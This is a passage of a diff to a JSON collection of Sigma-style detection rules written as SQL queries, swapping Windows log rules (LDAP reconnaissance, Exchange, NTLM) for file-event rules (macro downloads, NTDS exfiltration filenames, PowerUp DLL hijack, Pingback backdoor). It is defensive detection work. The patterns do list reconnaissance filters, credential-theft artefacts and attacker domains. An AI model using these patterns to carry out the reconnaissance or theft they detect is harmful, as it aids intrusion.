"author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.002", - "attack.t1087.002", - "attack.t1482" + "attack.initial_access", + "attack.t1566.001" + ], + "falsepositives": [ + "Legitimate macro files 
downloaded from the internet", + "Legitimate macro files sent as attachments via emails" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR 
SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" ], - "filename": "win_ldap_recon.yml" + "filename": "file_event_win_office_macro_files_downloaded.yml" }, { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Publisher Attachment File Dropped In Suspicious Location", + "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "status": "experimental", + "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. 
This could be a sign of attackers abusing Publisher documents", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of \".pub\" files from those locations" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" ], - "filename": "win_codeintegrity_revoked_driver.yml" + "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" }, { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. 
It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Suspicious Screensaver Binary File Creation", + "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", "status": "experimental", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "author": "frack113", "tags": [ - "attack.execution" + "attack.persistence", + "attack.t1546.002" ], "falsepositives": [ - "Antivirus products" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft 
Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" ], - "filename": 
"win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_creation_scr_binary_file.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_blocked_driver_load.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1071" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Potential Remote Desktop Connection to Non-Domain Host", - "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", - "status": "test", - "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", - "author": "James Pemberton", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], + "title": 
"Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", + "status": "experimental", + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Host connections to valid domains, exclude these.", - "Host connections not using host FQDN.", - "Host connections to external legitimate domains." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_susp_ntlm_rdp.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "NTLM Brute Force", - "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", + "title": "Suspicious NTDS 
Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects common NTLM brute force device names", - "author": "Jerry Shockley '@jsh0x'", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1110" + "attack.t1003.003" ], "falsepositives": [ - "Systems with names equal to the spoofed ones used by the brute force tools" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" ], - "filename": "win_susp_ntlm_brute_force.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "title": "New Outlook Macro Created", + "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the creation of a macro file for Outlook.", + "author": "@ScoubiMtl", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unknown" + "User genuinely creates a VB Macro for their email" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' 
AND = ' -Confirm \"False\"')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" + "filename": "file_event_win_office_outlook_macro_creation.yml" }, { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "title": "Suspicious Files in Default GPO Folder", + "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", + "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "author": "elhoim", "tags": [ - "attack.lateral_movement", - "attack.t1210" + "attack.t1036.005", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. 
Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_exchange_cve_2021_42321.yml" + "filename": "file_event_win_susp_default_gpo_dir_write.yml" }, { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Any powershell script that creates bat files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - 
"id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", - "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Suspicious desktop.ini Action", + "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", "tags": [ "attack.persistence", - "attack.t1505.002" + "attack.t1547.009" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Operations performed through Windows SCCM or equivalent", + "Read only access list authority" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_susp_desktop_ini.yml" }, { - "title": "MSExchange Transport Agent Installation - Builtin", - "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "title": "TeamViewer Remote Session", + "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - 
"author": "Tobias Michalski (Nextron Systems)", + "description": "Detects the creation of log files during a TeamViewer remote session", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Legitimate uses of TeamViewer in an organisation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\'))" ], - "filename": "win_exchange_transportagent.yml" + "filename": "file_event_win_susp_teamviewer_remote_session.yml" }, { - "title": "File Was Not Allowed To Run", - "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", - "status": "test", - "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", - "author": "Pushkarev Dmitry", + "title": "OneNote Attachment File Dropped In Suspicious Location", + "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", + "status": "experimental", + "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. 
This could be a sign of attackers abusing OneNote attachments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.006", - "attack.t1059.007" + "attack.defense_evasion" ], "falsepositives": [ - "Need tuning applocker or add exceptions in SIEM" + "Legitimate usage of \".one\" or \".onepkg\" files from those locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" ], - "filename": "win_applocker_file_was_not_allowed_to_run.yml" + "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" }, { - "title": "OpenSSH Server Listening On Socket", - "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", + "title": "Drop Binaries Into Spool Drivers Color Folder", + "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", "status": "experimental", - "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", - "author": "mdecrevoisier", + "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.004" + "attack.defense_evasion" ], 
